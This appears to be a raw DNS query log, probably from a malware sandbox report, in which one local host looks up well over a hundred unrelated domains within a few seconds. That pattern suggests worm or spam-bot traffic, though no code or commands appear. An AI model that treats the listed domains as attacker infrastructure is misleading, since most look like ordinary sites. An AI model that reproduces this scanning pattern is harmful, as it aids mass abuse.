                                                                                                                                                                              Sep 15, 2023 07:27:39.566385031 CEST192.168.2.38.8.8.80x9a14Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.567255974 CEST192.168.2.38.8.8.80x3a3Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.570154905 CEST192.168.2.38.8.8.80x51b4Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.600445032 CEST192.168.2.38.8.8.80xabe2Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.611648083 CEST192.168.2.38.8.8.80x9a7aStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.682813883 CEST192.168.2.38.8.8.80x6baeStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.689335108 CEST192.168.2.38.8.8.80xe907Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.691814899 CEST192.168.2.38.8.8.80x941Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.711627007 CEST192.168.2.38.8.8.80xf575Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.717865944 CEST192.168.2.38.8.8.80xfe90Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.727893114 CEST192.168.2.38.8.8.80x30e1Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.733329058 CEST192.168.2.38.8.8.80x2f27Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.733329058 CEST192.168.2.38.8.8.80x4a2dStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.733730078 CEST192.168.2.38.8.8.80x2732Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.739278078 CEST192.168.2.38.8.8.80xbb3Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.740478039 CEST192.168.2.38.8.8.80xcbebStandard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.741626024 CEST192.168.2.38.8.8.80xfe95Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.742450953 CEST192.168.2.38.8.8.80x8b2fStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.742937088 CEST192.168.2.38.8.8.80x329Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.743274927 CEST192.168.2.38.8.8.80x33cStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.750257015 CEST192.168.2.38.8.8.80xdd14Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.785687923 CEST192.168.2.38.8.8.80x47d9Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.790612936 CEST192.168.2.38.8.8.80x3de4Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.798161030 CEST192.168.2.38.8.8.80x6bc1Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.803419113 CEST192.168.2.38.8.8.80x5da3Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.811429024 CEST192.168.2.38.8.8.80x942cStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.822173119 CEST192.168.2.38.8.8.80x80fcStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.843980074 CEST192.168.2.38.8.8.80x9ce0Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.862272024 CEST192.168.2.38.8.8.80xa90aStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.888600111 CEST192.168.2.38.8.8.80x5b4cStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.939508915 CEST192.168.2.38.8.8.80x2c6fStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.945283890 CEST192.168.2.38.8.8.80xc30cStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.953051090 CEST192.168.2.38.8.8.80x46c9Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.956562996 CEST192.168.2.38.8.8.80x9e12Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.970174074 CEST192.168.2.38.8.8.80x31b5Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:39.989480019 CEST192.168.2.38.8.8.80xac12Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.044024944 CEST192.168.2.38.8.8.80xf4b7Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.050319910 CEST192.168.2.38.8.8.80x7b1eStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.063963890 CEST192.168.2.38.8.8.80xbb12Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.065386057 CEST192.168.2.38.8.8.80xa759Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.079751015 CEST192.168.2.38.8.8.80x3021Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.090864897 CEST192.168.2.38.8.8.80x52d3Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.096877098 CEST192.168.2.38.8.8.80x8623Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.142100096 CEST192.168.2.38.8.8.80x5d1dStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.164014101 CEST192.168.2.38.8.8.80x4691Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.171865940 CEST192.168.2.38.8.8.80x16e4Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.217974901 CEST192.168.2.38.8.8.80x6e3dStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.218806028 CEST192.168.2.38.8.8.80xd1baStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.224417925 CEST192.168.2.38.8.8.80x69fcStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.270013094 CEST192.168.2.38.8.8.80x709bStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.274245977 CEST192.168.2.38.8.8.80x6c19Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.275978088 CEST192.168.2.38.8.8.80xc00eStandard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.293482065 CEST192.168.2.38.8.8.80x2810Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.330593109 CEST192.168.2.38.8.8.80x7e0fStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.342763901 CEST192.168.2.38.8.8.80x56b4Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.352660894 CEST192.168.2.38.8.8.80x515aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.356034994 CEST192.168.2.38.8.8.80x739cStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.356841087 CEST192.168.2.38.8.8.80x6994Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.374325037 CEST192.168.2.38.8.8.80x3359Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.382446051 CEST192.168.2.38.8.8.80x3517Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.385212898 CEST192.168.2.38.8.8.80xd37eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.390306950 CEST192.168.2.38.8.8.80x5e44Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.418056011 CEST192.168.2.38.8.8.80xf48fStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.423362017 CEST192.168.2.38.8.8.80x5c31Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.442368984 CEST192.168.2.38.8.8.80xf35eStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.451082945 CEST192.168.2.38.8.8.80xc0a2Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.479967117 CEST192.168.2.38.8.8.80xd881Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.481288910 CEST192.168.2.38.8.8.80xb61fStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.488063097 CEST192.168.2.38.8.8.80xcfa1Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.505621910 CEST192.168.2.38.8.8.80x7bd7Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.576839924 CEST192.168.2.38.8.8.80x32abStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.595180988 CEST192.168.2.38.8.8.80x6d25Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.610481977 CEST192.168.2.38.8.8.80x6ec5Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.668975115 CEST192.168.2.38.8.8.80x6e90Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.673927069 CEST192.168.2.38.8.8.80x71e1Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.676074982 CEST192.168.2.38.8.8.80xa9aeStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.685775042 CEST192.168.2.38.8.8.80x71b4Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.700664997 CEST192.168.2.38.8.8.80x5436Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.701615095 CEST192.168.2.38.8.8.80xcce0Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.704468966 CEST192.168.2.38.8.8.80x77a1Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.719460011 CEST192.168.2.38.8.8.80xb493Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.720551014 CEST192.168.2.38.8.8.80x88Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.757611036 CEST192.168.2.38.8.8.80xae34Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.781544924 CEST192.168.2.38.8.8.80x5ad0Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.796693087 CEST192.168.2.38.8.8.80x9621Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.830790043 CEST192.168.2.38.8.8.80x30aeStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.873970985 CEST192.168.2.38.8.8.80xa146Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.877089024 CEST192.168.2.38.8.8.80xecc8Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.883605003 CEST192.168.2.38.8.8.80x18ffStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.907167912 CEST192.168.2.38.8.8.80xa3e0Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.953154087 CEST192.168.2.38.8.8.80xde8dStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.966841936 CEST192.168.2.38.8.8.80x28c3Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.996556997 CEST192.168.2.3192.228.79.2010xc2Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.002221107 CEST192.168.2.38.8.8.80x78faStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.041559935 CEST192.168.2.38.8.8.80xe5f5Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.046462059 CEST192.168.2.38.8.8.80x5f44Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.047139883 CEST192.168.2.38.8.8.80xbf15Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.068178892 CEST192.168.2.38.8.8.80x8b1aStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.078892946 CEST192.168.2.38.8.8.80x99fcStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.094052076 CEST192.168.2.38.8.8.80xc3d6Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.094926119 CEST192.168.2.3193.0.14.1290x3bStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.108298063 CEST192.168.2.38.8.8.80x7564Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.142327070 CEST192.168.2.38.8.8.80x684dStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.155057907 CEST192.168.2.38.8.8.80xb63cStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.190330029 CEST192.168.2.38.8.8.80xd7b4Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.214090109 CEST192.168.2.3192.36.148.170xb4Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.247385979 CEST192.168.2.38.8.8.80xb5fStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.253169060 CEST192.168.2.38.8.8.80x8a12Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.277039051 CEST192.168.2.38.8.8.80x4388Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.278583050 CEST192.168.2.38.8.8.80xb7fcStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.286216021 CEST192.168.2.38.8.8.80xd7b9Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.322935104 CEST192.168.2.3192.33.4.120x80Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.351135015 CEST192.168.2.38.8.8.80x8f09Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.360169888 CEST192.168.2.38.8.8.80x725dStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.401566982 CEST192.168.2.38.8.8.80xd37eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.407632113 CEST192.168.2.38.8.8.80xd215Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.413228989 CEST192.168.2.3192.36.148.170x28Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.423530102 CEST192.168.2.38.8.8.80xf63Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.431809902 CEST192.168.2.38.8.8.80x5c31Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.454246998 CEST192.168.2.38.8.8.80xbcbStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.466752052 CEST192.168.2.38.8.8.80xe054Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.481497049 CEST192.168.2.38.8.8.80x9f76Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.492765903 CEST192.168.2.38.8.8.80x4870Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.499882936 CEST192.168.2.38.8.8.80xe637Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.548746109 CEST192.168.2.38.8.8.80xa20Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.671349049 CEST192.168.2.38.8.8.80xa261Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.762001991 CEST192.168.2.38.8.8.80x9375Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.768066883 CEST192.168.2.38.8.8.80x5893Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.874758959 CEST192.168.2.38.8.8.80x4997Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.928647995 CEST192.168.2.38.8.8.80x63aaStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.977910042 CEST192.168.2.38.8.8.80xe5f9Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.981498003 CEST192.168.2.38.8.8.80x39a0Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.052089930 CEST192.168.2.38.8.8.80xf1afStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.092590094 CEST192.168.2.38.8.8.80xbd9cStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.096514940 CEST192.168.2.38.8.8.80x376cStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.127578020 CEST192.168.2.38.8.8.80xcb91Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.134227991 CEST192.168.2.38.8.8.80x5eaeStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.218616009 CEST192.168.2.38.8.8.80xceefStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.268982887 CEST192.168.2.38.8.8.80xd1ebStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.294157028 CEST192.168.2.38.8.8.80x1ef9Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.342279911 CEST192.168.2.38.8.8.80x7386Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.342281103 CEST192.168.2.38.8.8.80x2070Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.355956078 CEST192.168.2.38.8.8.80x45b3Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.415023088 CEST192.168.2.38.8.8.80x8030Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.436388016 CEST192.168.2.38.8.8.80xe71aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.439806938 CEST192.168.2.38.8.8.80x4c2eStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.439806938 CEST192.168.2.38.8.8.80xdcfStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.439806938 CEST192.168.2.38.8.8.80x5993Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.447690964 CEST192.168.2.38.8.8.80x5c31Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.448667049 CEST192.168.2.38.8.8.80x6731Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.450395107 CEST192.168.2.38.8.8.80x9f22Standard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.458992958 CEST192.168.2.38.8.8.80xc061Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.461364985 CEST192.168.2.38.8.8.80x8434Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.462896109 CEST192.168.2.38.8.8.80x9d4eStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.468215942 CEST192.168.2.38.8.8.80x22a4Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.468622923 CEST192.168.2.38.8.8.80x5e49Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.472728014 CEST192.168.2.38.8.8.80xb93cStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.480242968 CEST192.168.2.38.8.8.80xf0deStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.497076035 CEST192.168.2.38.8.8.80x5b20Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.514491081 CEST192.168.2.38.8.8.80x8ecfStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.566992044 CEST192.168.2.38.8.8.80x4179Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.573103905 CEST192.168.2.38.8.8.80x1077Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.613778114 CEST192.168.2.38.8.8.80xb391Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.621241093 CEST192.168.2.38.8.8.80xd9ddStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.637645960 CEST192.168.2.38.8.8.80x3c64Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.658802032 CEST192.168.2.38.8.8.80x552cStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.668207884 CEST192.168.2.38.8.8.80xb435Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.679168940 CEST192.168.2.38.8.8.80xfcccStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.699834108 CEST192.168.2.38.8.8.80x875Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.710295916 CEST192.168.2.38.8.8.80x1d31Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.715672016 CEST192.168.2.38.8.8.80xd9f7Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.720062017 CEST192.168.2.38.8.8.80xd7aStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.725430965 CEST192.168.2.38.8.8.80x97a7Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.736696959 CEST192.168.2.38.8.8.80x70b6Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.746455908 CEST192.168.2.38.8.8.80xd4dfStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.775567055 CEST192.168.2.38.8.8.80x9375Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.814034939 CEST192.168.2.38.8.8.80xe1beStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.859117031 CEST192.168.2.38.8.8.80xfef3Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.887341976 CEST192.168.2.38.8.8.80x948Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.887661934 CEST192.168.2.38.8.8.80x73c7Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.901110888 CEST192.168.2.38.8.8.80xad5Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.906733990 CEST192.168.2.38.8.8.80xf74cStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.915904999 CEST192.168.2.38.8.8.80x63aaStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.936846018 CEST192.168.2.38.8.8.80xa38dStandard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.942091942 CEST192.168.2.38.8.8.80x7b23Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.970016956 CEST192.168.2.38.8.8.80x5a43Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.981177092 CEST192.168.2.38.8.8.80xaefdStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
